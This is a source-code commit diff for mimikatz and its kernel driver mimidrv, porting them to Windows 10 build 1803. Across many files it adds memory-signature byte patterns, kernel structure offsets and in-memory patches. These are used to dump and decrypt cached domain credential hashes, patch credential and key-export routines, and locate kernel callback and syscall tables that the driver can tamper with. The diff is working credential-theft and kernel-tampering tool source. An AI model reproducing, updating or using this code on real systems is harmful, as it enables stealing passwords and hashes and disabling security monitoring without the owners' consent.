[new] mimikatz & mimidrv support for Windows 10 build 1803 (17623) x64

[internal] structures for SAM cache

inc/globals.h

@@ -95,6 +95,8 @@ DWORD MIMIKATZ_NT_MAJOR_VERSION, MIMIKATZ_NT_MINOR_VERSION, MIMIKATZ_NT_BUILD_NU
 #define KULL_M_WIN_BUILD_10_1607		14393
 #define KULL_M_WIN_BUILD_10_1703		15063
 #define KULL_M_WIN_BUILD_10_1709		16299
+#define KULL_M_WIN_BUILD_10_1803		17623
+
 
 #define KULL_M_WIN_MIN_BUILD_XP		2500
 #define KULL_M_WIN_MIN_BUILD_2K3	3000

mimidrv/globals.h

@@ -39,7 +39,8 @@ typedef enum _KIWI_OS_INDEX {
 	KiwiOsIndex_10_1607	= 9,
 	KiwiOsIndex_10_1703	= 10,
 	KiwiOsIndex_10_1709	= 11,
-	KiwiOsIndex_MAX		= 12,
+	KiwiOsIndex_10_1803	= 12,
+	KiwiOsIndex_MAX		= 13,
 } KIWI_OS_INDEX, *PKIWI_OS_INDEX;
 
 #ifdef _M_IX86

mimidrv/kkll_m_filters.c

@@ -21,6 +21,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
 /* 10_1607*/{0x004c, 0x000c, 0x0010, 0x0040},
 /* 10_1703*/{0x004c, 0x000c, 0x0010, 0x0040},
 /* 10_1709*/{0x004c, 0x000c, 0x0010, 0x0040},
+/* 10_1803*/{0x004c, 0x000c, 0x0010, 0x0040},
 #else
 /* UNK	*/	{0},
 /* XP	*/	{0},
@@ -34,6 +35,7 @@ const ULONG MF_OffSetTable[KiwiOsIndex_MAX][MF_MAX] =
 /* 10_1607*/{0x0090, 0x0018, 0x0020, 0x0060},
 /* 10_1703*/{0x0090, 0x0018, 0x0020, 0x0060},
 /* 10_1709*/{0x0090, 0x0018, 0x0020, 0x0060},
+/* 10_1803*/{0x0090, 0x0018, 0x0020, 0x0060},
 #endif
 };
 

mimidrv/kkll_m_notify.c

@@ -13,7 +13,7 @@ PKKLL_M_MEMORY_OFFSETS pCmpCallBackOffsets = NULL;
 POBJECT_DIRECTORY *ObpTypeDirectoryObject = NULL;
 PKKLL_M_MEMORY_OFFSETS pObpTypeDirectoryObjectOffsets = NULL;
 
-PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL;
+//PPSSETCREATEPROCESSNOTIFYROUTINEEX pPsSetCreateProcessNotifyRoutineEx = NULL;
 POB_PRE_OPERATION_CALLBACK kkll_m_notify_fakePre = NULL;
 POB_POST_OPERATION_CALLBACK kkll_m_notify_fakePost = NULL;
 
@@ -32,6 +32,7 @@ KKLL_M_MEMORY_GENERIC ThreadReferences[] = {
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
+	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_Thread), PTRN_W10_Thread},				L"PsRemoveCreateThreadNotifyRoutine",	L"PsRemoveLoadImageNotifyRoutine",	{ -8, 64}},
 };
 UCHAR PTRN_W23_Process[] =	{0x41, 0xbf, 0x08, 0x00, 0x00, 0x00, 0x49, 0x8b, 0xdf, 0x48, 0x8b, 0xce, 0xe8};
 UCHAR PTRN_WVI_Process[] =	{0x48, 0x89, 0x4c, 0x24, 0x40, 0x41, 0xbe, 0x40, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x0c, 0xc1, 0xe8};
@@ -42,7 +43,7 @@ UCHAR PTRN_W10_1507_Process[] =	{0x8b, 0xc3, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6,
 UCHAR PTRN_W10_1511_Process[] =	{0x49, 0x8d, 0x0c, 0xff, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
 UCHAR PTRN_W10_1607_Process[] = {0x49, 0x8d, 0x0c, 0xfc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
 UCHAR PTRN_W10_1703_Process[] = {0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd6, 0xe8};
-UCHAR PTRN_W10_1709_Process[] = {0x48, 0x8d, 0x0c, 0xdd, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x49, 0x03, 0xcd, 0x48, 0x8b, 0xd6, 0xe8};
+UCHAR PTRN_W10_1709_Process[] = {0x48, 0x8d, 0x0c, 0xdd, 0x00, 0x00, 0x00, 0x00, 0x45, 0x33, 0xc0, 0x49, 0x03, 0xcd, 0x48, 0x8b/*, 0xd6, 0xe8*/};
 KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
 	{KiwiOsIndex_2K3,		{sizeof(PTRN_W23_Process), PTRN_W23_Process},			L"PsReferencePrimaryToken",				L"CcSetBcbOwnerPointer",			{ -4,  8}},
 	{KiwiOsIndex_VISTA,		{sizeof(PTRN_WVI_Process), PTRN_WVI_Process},			L"SeCreateAccessStateEx",				L"PsReferenceImpersonationToken",	{ -4, 64}},
@@ -54,6 +55,7 @@ KKLL_M_MEMORY_GENERIC ProcessReferences[] = {
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_1607_Process), PTRN_W10_1607_Process},	L"PsSetCreateProcessNotifyRoutine",		L"KeRegisterProcessorChangeCallback",	{ -4, 64}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_1703_Process), PTRN_W10_1703_Process},	L"PsSetCreateProcessNotifyRoutine",		L"KeRegisterProcessorChangeCallback",	{ -4, 64}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_1709_Process), PTRN_W10_1709_Process},	L"PsSetCreateProcessNotifyRoutine",		L"RtlGetSystemBootStatus",				{ -4, 64}},
+	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_1709_Process), PTRN_W10_1709_Process},	L"PsSetCreateProcessNotifyRoutine",		L"EtwEnableTrace",					{ -4, 64}},
 };
 UCHAR PTRN_W23_Image[] =	{0x4c, 0x8b, 0xf1, 0x48, 0x89, 0x78, 0x20, 0x4d, 0x8b, 0xe0, 0x4c, 0x8b, 0xea, 0xbd, 0x08, 0x00, 0x00, 0x00};
 UCHAR PTRN_WVI_Image[] =	{0x4c, 0x8b, 0xf2, 0x41, 0x0f, 0xba, 0x6d, 0x00, 0x0a, 0x4c, 0x8b, 0xf9, 0x49, 0xc7, 0x00, 0x38, 0x00, 0x00, 0x00};
@@ -72,6 +74,7 @@ KKLL_M_MEMORY_GENERIC ImageReferences[] = {
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"SeRegisterLogonSessionTerminatedRoutineEx",	{ -4,  64}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
+	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_Image), PTRN_W10_Image},				L"PsSetLoadImageNotifyRoutine",			L"PsSetCreateProcessNotifyRoutine",	{ -4,  64}},
 };
 UCHAR PTRN_W23_Object[] =	{0x40, 0x32, 0xf6, 0x4c, 0x89, 0x7c, 0x24, 0x78, 0x45, 0x33, 0xff, 0x4d, 0x85, 0xe4};
 UCHAR PTRN_WVI_Object[] =	{0x41, 0x8a, 0xdf, 0x4c, 0x89, 0x7c, 0x24, 0x58, 0x4d, 0x3b, 0xe7, 0x88, 0x5c, 0x24, 0x66, 0x4c, 0x89, 0x7c, 0x24, 0x50, 0x49, 0x8b, 0xef, 0xc7, 0x44, 0x24, 0x68};
@@ -90,6 +93,7 @@ KKLL_M_MEMORY_GENERIC ObjectReferences[] = {
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"KseRegisterShim",					{ 25, 0x010, 0x070, 0x0c8}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"IoCreateDriver",					{ 25, 0x010, 0x070, 0x0c8}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"IoCreateDriver",					{ 25, 0x010, 0x070, 0x0c8}},
+	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_Object), PTRN_W10_Object},				L"ObCreateObjectType",					L"IoCreateDriver",					{ 25, 0x010, 0x070, 0x0c8}},
 };
 UCHAR PTRN_W23_Reg[] =	{0x49, 0x8d, 0x0c, 0xdc, 0x45, 0x33, 0xc0, 0x48, 0x8b, 0xd7, 0xe8};
 UCHAR PTRN_WVI_Reg[] =	{0x48, 0x8b, 0xf0, 0x48, 0x89, 0x44, 0x24, 0x38, 0x48, 0x85, 0xc0, 0x0f, 0x84};
@@ -108,6 +112,7 @@ KKLL_M_MEMORY_GENERIC RegReferences[] = {
 	{KiwiOsIndex_10_1607,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"FsRtlAllocateResource",			{ -9, 0x028}},
 	{KiwiOsIndex_10_1703,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"DbgkLkmdUnregisterCallback",		{ -9, 0x028}},
 	{KiwiOsIndex_10_1709,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"DbgkLkmdUnregisterCallback",		{ -9, 0x028}},
+	{KiwiOsIndex_10_1803,	{sizeof(PTRN_W10_Reg), PTRN_W10_Reg},					L"CmUnRegisterCallback",				L"DbgkLkmdUnregisterCallback",		{ -9, 0x028}},
 };
 #elif defined _M_IX86
 UCHAR PTRN_WXP_Thread[] =	{0xc7, 0x45, 0xa4, 0x08, 0x00, 0x00, 0x00, 0xff, 0x75, 0xbc, 0xe8};

mimidrv/kkll_m_process.c

@@ -19,7 +19,8 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
 /* 10_1511*/{0x00b8, 0x00c0, 0x0040, 0x02dc},
 /* 10_1607*/{0x00b8, 0x00c0, 0x0040, 0x02e4},
 /* 10_1703*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
-/* 10_1709*/{0x00b8, 0x00c0, 0x0040, 0x02ec}, //
+/* 10_1709*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
+/* 10_1803*/{0x00b8, 0x00c0, 0x0040, 0x02ec},
 #else
 /* UNK	*/	{0},
 /* XP	*/	{0},
@@ -33,6 +34,7 @@ const ULONG EPROCESS_OffSetTable[KiwiOsIndex_MAX][Eprocess_MAX] =
 /* 10_1607*/{0x02f0, 0x0300, 0x0040, 0x06c0},
 /* 10_1703*/{0x02e8, 0x0300, 0x0040, 0x06c8},
 /* 10_1709*/{0x02e8, 0x0300, 0x0040, 0x06c8},
+/* 10_1803*/{0x02e8, 0x0300, 0x0040, 0x06c8},
 #endif
 };
 

mimidrv/kkll_m_ssdt.c

@@ -44,6 +44,7 @@ NTSTATUS kkll_m_ssdt_list(PKIWI_BUFFER outBuffer)
 
 #ifdef _M_X64
 const UCHAR PTRN_WALL_Ke[]	= {/*0x00, 0x00, 0x4d, 0x0f, 0x45,*/ 0xd3, 0x42, 0x3b, 0x44, 0x17, 0x10, 0x0f, 0x83};
+const UCHAR PTRN_W1803_Ke[] = {0xd3, 0x41, 0x3b, 0x44, 0x3a, 0x10, 0x0f, 0x83};
 const LONG OFFS_WNO8_Ke		= -24;//-19;
 const LONG OFFS_WIN8_Ke		= -21;//-16;
 const LONG OFFS_WIN10A_Ke	= -38;//-16;
@@ -53,7 +54,15 @@ NTSTATUS kkll_m_ssdt_getKeServiceDescriptorTable()
 	if(KeServiceDescriptorTable)
 		status = STATUS_SUCCESS;
 	else
-		status = kkll_m_memory_genericPointerSearch((PUCHAR *) &KeServiceDescriptorTable, ((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE), ((PUCHAR) ZwUnloadKey) + (16 * PAGE_SIZE), PTRN_WALL_Ke, sizeof(PTRN_WALL_Ke), (KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke);
+	{
+		status = kkll_m_memory_genericPointerSearch(
+			(PUCHAR *) &KeServiceDescriptorTable,
+			((PUCHAR) ZwUnloadKey) - (21 * PAGE_SIZE),
+			((PUCHAR) ZwUnloadKey) + (19 * PAGE_SIZE),
+			(KiwiOsIndex < KiwiOsIndex_10_1803) ? PTRN_WALL_Ke : PTRN_W1803_Ke,
+			(KiwiOsIndex < KiwiOsIndex_10_1803) ? sizeof(PTRN_WALL_Ke) : sizeof(PTRN_W1803_Ke),
+			(KiwiOsIndex < KiwiOsIndex_8) ? OFFS_WNO8_Ke : (KiwiOsIndex < KiwiOsIndex_10_1607) ? OFFS_WIN8_Ke : OFFS_WIN10A_Ke);
+	}
 	return status;
 }
 #endif

mimidrv/mimidrv.c

@@ -167,8 +167,8 @@ NTSTATUS MimiDispatchDeviceControl(IN OUT DEVICE_OBJECT *DeviceObject, IN OUT IR
 
 KIWI_OS_INDEX getWindowsIndex()
 {
-	if(*NtBuildNumber > 16299) // forever 10 =)
-		return KiwiOsIndex_10_1709;
+	if(*NtBuildNumber > 17623) // forever 10 =)
+		return KiwiOsIndex_10_1803;
 
 	switch(*NtBuildNumber)
 	{
@@ -210,6 +210,9 @@ KIWI_OS_INDEX getWindowsIndex()
 		case 16299:
 			return KiwiOsIndex_10_1709;
 			break;
+		case 17623:
+			return KiwiOsIndex_10_1803;
+			break;
 		default:
 			return KiwiOsIndex_UNK;
 	}

mimikatz/modules/crypto/kuhl_m_crypto_patch.c

@@ -92,6 +92,7 @@ KULL_M_PATCH_GENERIC CngReferences[] = {
 	{KULL_M_WIN_BUILD_BLUE,		{sizeof(PTRN_WI81_SPCryptExportKey),	PTRN_WI81_SPCryptExportKey},	{sizeof(PATC_WALL_SPCryptExportKey_EXPORT), PATC_WALL_SPCryptExportKey_EXPORT}, {4}},
 	{KULL_M_WIN_BUILD_10_1607,	{sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
 	{KULL_M_WIN_BUILD_10_1703,	{sizeof(PTRN_W10_1703_SPCryptExportKey),PTRN_W10_1703_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
+	{KULL_M_WIN_BUILD_10_1803,	{sizeof(PTRN_W10_1607_SPCryptExportKey),PTRN_W10_1607_SPCryptExportKey},{sizeof(PATC_W10_1607_SPCryptExportKey_EXPORT), PATC_W10_1607_SPCryptExportKey_EXPORT}, {4}},
 };
 #elif defined _M_IX86
 BYTE PTRN_WNO8_SPCryptExportKey[]			= {0xf6, 0x41, 0x20, 0x02, 0x75};

mimikatz/modules/kuhl_m_lsadump.c

@@ -695,6 +695,7 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity,
 	BYTE digest[MD5_DIGEST_LENGTH];
 	CRYPTO_BUFFER data, key = {MD5_DIGEST_LENGTH, MD5_DIGEST_LENGTH, digest};
 	LSA_UNICODE_STRING usr;
+	
 
 	if(kuhl_m_lsadump_decryptSecret(hSecurity, hPolicyBase, L"Secrets\\NL$KM\\CurrVal", lsaKeysStream, lsaKeyUnique, &pNLKM, &szNLKM))
 	{
@@ -742,8 +743,8 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity,
 										usr.Length = usr.MaximumLength = pMsCacheEntry->szUserName;
 										usr.Buffer = (PWSTR) ((PBYTE) pMsCacheEntry->enc_data + sizeof(MSCACHE_DATA));
 
-										if(pCacheData->hProv && ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->unk1)
-											kuhl_m_lsadump_decryptSCCache(pMsCacheEntry->enc_data + (s1 - ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->unk1), ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->unk1, pCacheData->hProv, pCacheData->keySpec);
+										if(pCacheData->hProv && ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC)
+											kuhl_m_lsadump_decryptSCCache(pMsCacheEntry->enc_data + (s1 - ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC), ((PMSCACHE_DATA) pMsCacheEntry->enc_data)->szSC, pCacheData->hProv, pCacheData->keySpec);
 
 										if(pCacheData && pCacheData->username && (_wcsnicmp(pCacheData->username, usr.Buffer, usr.Length / sizeof(wchar_t)) == 0))
 										{
@@ -818,10 +819,49 @@ BOOL kuhl_m_lsadump_getNLKMSecretAndCache(IN PKULL_M_REGISTRY_HANDLE hSecurity,
 
 void kuhl_m_lsadump_printMsCache(PMSCACHE_ENTRY entry, CHAR version)
 {
-	kprintf(L"User      : %.*s\\%.*s\n",
-		entry->szDomainName / sizeof(wchar_t), (PBYTE) entry->enc_data + sizeof(MSCACHE_DATA) + entry->szUserName + 2 * ((entry->szUserName / sizeof(wchar_t)) % 2),
-		entry->szUserName / sizeof(wchar_t), (PBYTE) entry->enc_data + sizeof(MSCACHE_DATA)
-		);
+	//DWORD i;
+	MSCACHE_ENTRY_PTR ptr;
+	ptr.UserName.Buffer = (PWSTR) ((PBYTE) entry->enc_data + sizeof(MSCACHE_DATA));
+	ptr.UserName.Length = ptr.UserName.MaximumLength = entry->szUserName;
+	ptr.Domain.Buffer = (PWSTR) ((PBYTE) ptr.UserName.Buffer + SIZE_ALIGN(entry->szUserName, 4));
+	ptr.Domain.Length = ptr.Domain.MaximumLength = entry->szDomainName;
+	//ptr.DnsDomainName.Buffer = (PWSTR) ((PBYTE) ptr.Domain.Buffer + SIZE_ALIGN(entry->szDomainName, 4));
+	//ptr.DnsDomainName.Length = ptr.DnsDomainName.MaximumLength = entry->szDnsDomainName;
+	//ptr.Upn.Buffer = (PWSTR) ((PBYTE) ptr.DnsDomainName.Buffer + SIZE_ALIGN(entry->szDnsDomainName, 4));
+	//ptr.Upn.Length = ptr.Upn.MaximumLength = entry->szupn;
+	//ptr.EffectiveName.Buffer = (PWSTR) ((PBYTE) ptr.Upn.Buffer + SIZE_ALIGN(entry->szupn, 4));
+	//ptr.EffectiveName.Length = ptr.EffectiveName.MaximumLength = entry->szEffectiveName;
+	//ptr.FullName.Buffer = (PWSTR) ((PBYTE) ptr.EffectiveName.Buffer + SIZE_ALIGN(entry->szEffectiveName, 4));
+	//ptr.FullName.Length = ptr.FullName.MaximumLength = entry->szFullName;
+	//ptr.LogonScript.Buffer = (PWSTR) ((PBYTE) ptr.FullName.Buffer + SIZE_ALIGN(entry->szFullName, 4));
+	//ptr.LogonScript.Length = ptr.LogonScript.MaximumLength = entry->szlogonScript;
+	//ptr.ProfilePath.Buffer = (PWSTR) ((PBYTE) ptr.LogonScript.Buffer + SIZE_ALIGN(entry->szlogonScript, 4));
+	//ptr.ProfilePath.Length = ptr.ProfilePath.MaximumLength = entry->szprofilePath;
+	//ptr.HomeDirectory.Buffer = (PWSTR) ((PBYTE) ptr.ProfilePath.Buffer + SIZE_ALIGN(entry->szprofilePath, 4));
+	//ptr.HomeDirectory.Length = ptr.HomeDirectory.MaximumLength = entry->szhomeDirectory;
+	//ptr.HomeDirectoryDrive.Buffer = (PWSTR) ((PBYTE) ptr.HomeDirectory.Buffer + SIZE_ALIGN(entry->szhomeDirectory, 4));
+	//ptr.HomeDirectoryDrive.Length = ptr.HomeDirectoryDrive.MaximumLength = entry->szhomeDirectoryDrive;
+	//ptr.Groups = (PGROUP_MEMBERSHIP) ((PBYTE) ptr.HomeDirectoryDrive.Buffer + SIZE_ALIGN(entry->szhomeDirectoryDrive, 4));
+	//ptr.LogonDomainName.Buffer = (PWSTR) ((PBYTE) ptr.Groups + SIZE_ALIGN(entry->groupCount * sizeof(GROUP_MEMBERSHIP), 4));
+	//ptr.LogonDomainName.Length = ptr.LogonDomainName.MaximumLength = entry->szlogonDomainName;
+
+	//kprintf(L"UserName     : %wZ\n", &ptr.UserName);
+	//kprintf(L"Domain       : %wZ\n", &ptr.Domain);
+	//kprintf(L"DnsDomainName: %wZ\n", &ptr.DnsDomainName);
+	//kprintf(L"Upn          : %wZ\n", &ptr.Upn);
+	//kprintf(L"EffectiveName: %wZ\n", &ptr.EffectiveName);
+	//kprintf(L"FullName     : %wZ\n", &ptr.FullName);
+	//kprintf(L"LogonScript  : %wZ\n", &ptr.LogonScript);
+	//kprintf(L"ProfilePath  : %wZ\n", &ptr.ProfilePath);
+	//kprintf(L"HomeDirectory: %wZ\n", &ptr.HomeDirectory);
+	//kprintf(L"HomeDirectoryDrive: %wZ\n", &ptr.HomeDirectoryDrive);
+	//kprintf(L"Groups       :");
+	//for(i = 0; i < entry->groupCount; i++)
+	//	kprintf(L" %u", ptr.Groups[i].RelativeId);
+	//kprintf(L"\n");
+	//kprintf(L"LogonDomainName: %wZ\n", &ptr.LogonDomainName);
+	//kprintf(L"sidCount: %u\n", entry->sidCount);
+	kprintf(L"User      : %wZ\\%wZ\n", &ptr.Domain, &ptr.UserName);
 	kprintf(L"MsCacheV%c : ", version); kull_m_string_wprintf_hex(((PMSCACHE_DATA) entry->enc_data)->mshashdata, LM_NTLM_HASH_LENGTH, 0); kprintf(L"\n");
 }
 
@@ -1124,6 +1164,7 @@ KULL_M_PATCH_GENERIC SamSrvReferences[] = {
 	{KULL_M_WIN_BUILD_BLUE,		{sizeof(PTRN_WALL_SampQueryInformationUserInternal),	PTRN_WALL_SampQueryInformationUserInternal},	{sizeof(PATC_WALL_JmpShort),	PATC_WALL_JmpShort},	{-24}},
 	{KULL_M_WIN_BUILD_10_1507,	{sizeof(PTRN_WALL_SampQueryInformationUserInternal),	PTRN_WALL_SampQueryInformationUserInternal},	{sizeof(PATC_WALL_JmpShort),	PATC_WALL_JmpShort},	{-21}},
 	{KULL_M_WIN_BUILD_10_1703,	{sizeof(PTRN_WALL_SampQueryInformationUserInternal),	PTRN_WALL_SampQueryInformationUserInternal},	{sizeof(PATC_WALL_JmpShort),	PATC_WALL_JmpShort},	{-19}},
+	{KULL_M_WIN_BUILD_10_1709,	{sizeof(PTRN_WALL_SampQueryInformationUserInternal),	PTRN_WALL_SampQueryInformationUserInternal},	{sizeof(PATC_WALL_JmpShort),	PATC_WALL_JmpShort},	{-21}},
 };
 #elif defined _M_IX86
 BYTE PTRN_WALL_SampQueryInformationUserInternal[]	= {0xc6, 0x40, 0x22, 0x00, 0x8b};

mimikatz/modules/kuhl_m_lsadump.h

@@ -266,7 +266,7 @@ typedef struct _MSCACHE_ENTRY {
 	WORD szUserName;
 	WORD szDomainName;
 	WORD szEffectiveName;
-	WORD szfullName;
+	WORD szFullName;
 	WORD szlogonScript;
 	WORD szprofilePath;
 	WORD szhomeDirectory;
@@ -289,11 +289,30 @@ typedef struct _MSCACHE_ENTRY {
 	BYTE enc_data[ANYSIZE_ARRAY];
 } MSCACHE_ENTRY, *PMSCACHE_ENTRY;
 
+typedef struct _MSCACHE_ENTRY_PTR {
+	UNICODE_STRING UserName;
+	UNICODE_STRING Domain;
+	UNICODE_STRING DnsDomainName;
+	UNICODE_STRING Upn;
+	UNICODE_STRING EffectiveName;
+	UNICODE_STRING FullName;
+
+	UNICODE_STRING LogonScript;
+	UNICODE_STRING ProfilePath;
+	UNICODE_STRING HomeDirectory;
+	UNICODE_STRING HomeDirectoryDrive;
+
+	PGROUP_MEMBERSHIP Groups;
+
+	UNICODE_STRING LogonDomainName;
+
+} MSCACHE_ENTRY_PTR, *PMSCACHE_ENTRY_PTR;
+
 typedef struct _MSCACHE_DATA {
 	BYTE mshashdata[LM_NTLM_HASH_LENGTH];
 	BYTE unkhash[LM_NTLM_HASH_LENGTH];
 	DWORD unk0;
-	DWORD unk1;
+	DWORD szSC;
 	DWORD unkLength;
 	DWORD unk2;
 	DWORD unk3;

mimikatz/modules/kuhl_m_standard.c

@@ -90,7 +90,7 @@ NTSTATUS kuhl_m_standard_base64(int argc, wchar_t * argv[])
 
 const wchar_t *version_libs[] = {
 	L"lsasrv.dll", L"msv1_0.dll", L"tspkg.dll", L"wdigest.dll", L"kerberos.dll", L"livessp.dll", L"dpapisrv.dll",
-	L"kdcsvd.dll", L"cryptdll.dll", L"lsadb.dll", L"samsrv.dll", L"rsaenh.dll", L"ncrypt.dll", L"ncryptprov.dll",
+	L"kdcsvc.dll", L"cryptdll.dll", L"lsadb.dll", L"samsrv.dll", L"rsaenh.dll", L"ncrypt.dll", L"ncryptprov.dll",
 	L"eventlog.dll", L"wevtsvc.dll", L"termsrv.dll",
 };
 NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[])
@@ -99,6 +99,10 @@ NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[])
 	PVOID buffer;
 	UINT lenVer;
 	VS_FIXEDFILEINFO *verInfo;
+	PKIWI_CABINET pCab;
+	wchar_t *system, *cabname, pathc[MAX_PATH];
+	DWORD dwSystem;
+	char *pFile, *acabname;
 	BOOL isWow64
 	#ifdef _M_X64
 	 = TRUE;
@@ -135,7 +139,7 @@ NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[])
 		}
 	}
 	#endif
-	if(argc)
+	if(kull_m_string_args_byName(argc, argv, L"full", NULL, NULL))
 	{
 		kprintf(L"\n");
 		for(i = 0; i < ARRAYSIZE(version_libs); i++)
@@ -157,6 +161,52 @@ NTSTATUS kuhl_m_standard_version(int argc, wchar_t * argv[])
 			}
 		}
 	}
+
+	if(kull_m_string_args_byName(argc, argv, L"cab", NULL, NULL))
+	{
+		kprintf(L"\n");
+		if(dwSystem = GetSystemDirectory(NULL, 0))
+		{
+			if(system = (wchar_t *) LocalAlloc(LPTR, dwSystem * sizeof(wchar_t)))
+			{
+				if(GetSystemDirectory(system, dwSystem) == (dwSystem - 1))
+				{
+					if(kull_m_string_sprintf(&cabname, MIMIKATZ L"_" MIMIKATZ_ARCH L"_sysfiles_%u", MIMIKATZ_NT_BUILD_NUMBER))
+					{
+						if(acabname = kull_m_string_unicode_to_ansi(cabname))
+						{
+							kprintf(L"CAB: %S\n", acabname);
+							if(pCab = kull_m_cabinet_create(acabname))
+							{
+								for(i = 0; i < ARRAYSIZE(version_libs); i++)
+								{
+									if(PathCombine(pathc, system, version_libs[i]))
+									{
+										if(kull_m_file_isFileExist(pathc))
+										{
+											if(pFile = kull_m_string_unicode_to_ansi(pathc))
+											{
+												kprintf(L" -> %s\n", version_libs[i]);
+												kull_m_cabinet_add(pCab, pFile, NULL);
+												LocalFree(pFile);
+											}
+										}
+									}
+									else PRINT_ERROR_AUTO(L"PathCombine");
+								}
+								kull_m_cabinet_close(pCab);
+							}
+							LocalFree(acabname);
+						}
+						LocalFree(cabname);
+					}
+				}
+				else PRINT_ERROR_AUTO(L"GetSystemDirectory(data)");
+				LocalFree(system);
+			}
+		}
+		else PRINT_ERROR_AUTO(L"GetSystemDirectory(init)");	
+	}
 	return STATUS_SUCCESS;
 }
 

mimikatz/modules/kuhl_m_standard.h

@@ -5,10 +5,11 @@
 */
 #pragma once
 #include "kuhl_m.h"
-#include "../modules/kull_m_string.h"
-#include "../modules/kull_m_file.h"
-#include "../modules/kull_m_process.h"
-#include "../modules/kull_m_net.h"
+#include "../../modules/kull_m_string.h"
+#include "../../modules/kull_m_file.h"
+#include "../../modules/kull_m_process.h"
+#include "../../modules/kull_m_net.h"
+#include "../../modules/kull_m_cabinet.h"
 
 const KUHL_M kuhl_m_standard;
 

mimikatz/modules/kuhl_m_vault.c

@@ -376,6 +376,7 @@ BYTE PTRN_WN62_CredpCloneCredential[]			= {0x44, 0x8b, 0xfa, 0x41, 0x83, 0xe7, 0
 BYTE PTRN_WN63_CredpCloneCredential[]			= {0x45, 0x8b, 0xf8, 0x44, 0x23, 0xfa};
 BYTE PTRN_WN10_1607_CredpCloneCredential[]		= {0x45, 0x8b, 0xe0, 0x41, 0x83, 0xe4, 0x01, 0x75};
 BYTE PTRN_WN10_1703_CredpCloneCredential[]		= {0x45, 0x8b, 0xe6, 0x41, 0x83, 0xe4, 0x01, 0x75};
+BYTE PTRN_WN10_1803_CredpCloneCredential[]		= {0x45, 0x8b, 0xfe, 0x41, 0x83, 0xe7, 0x01, 0x75};
 BYTE PATC_WNT5_CredpCloneCredentialJmpShort[]	= {0x90, 0xe9};
 BYTE PATC_WALL_CredpCloneCredentialJmpShort[]	= {0xeb};
 BYTE PATC_WN64_CredpCloneCredentialJmpShort[]	= {0x90, 0x90, 0x90, 0x90, 0x90, 0x90};
@@ -387,6 +388,7 @@ KULL_M_PATCH_GENERIC CredpCloneCredentialReferences[] = {
